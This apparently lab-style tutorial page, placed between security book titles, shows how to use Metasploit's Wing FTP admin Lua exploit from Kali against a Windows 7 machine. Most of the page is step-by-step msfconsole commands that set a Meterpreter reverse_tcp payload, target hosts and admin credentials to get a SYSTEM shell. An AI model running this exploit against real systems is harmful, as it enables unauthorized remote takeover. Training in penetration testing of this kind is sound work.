CWNA: Certified Wireless Network Administrator Official Study Guide, 4th Edition: Exam CWNA-106


CEH Certified Ethical Hacker Practice Exams, 2nd Edition


Hack Remote Windows PC using Wing FTP Server Authenticated Command Execution

This module exploits the embedded Lua interpreter in the admin web interface for versions 4.3.8 and below. When supplying a specially crafted HTTP POST request an attacker can use os.execute() to execute arbitrary system commands on the target with SYSTEM privileges.

Exploit Targets
Wing FTP 4.3.8

Attacker: kali Linux
Victim PC: Windows 7

Open Kali terminal type msfconsole

Now type use exploit/windows/ftp/wing_ftp_admin_exec
msf exploit (wing_ftp_admin_exec)>set payload windows/meterpreter/reverse_tcp
msf exploit (wing_ftp_admin_exec)>set lhost (IP of Local Host)
msf exploit (wing_ftp_admin_exec)>set rhost (IP of Remote Host)
msf exploit (wing_ftp_admin_exec)>set username rajchandel
msf exploit (wing_ftp_admin_exec)>set password --------
msf exploit (wing_ftp_admin_exec)>exploit  

CEH Certified Ethical Hacker Version 8 Study Guide


Cyber Power: Crime, Conflict and Security in Cyberspace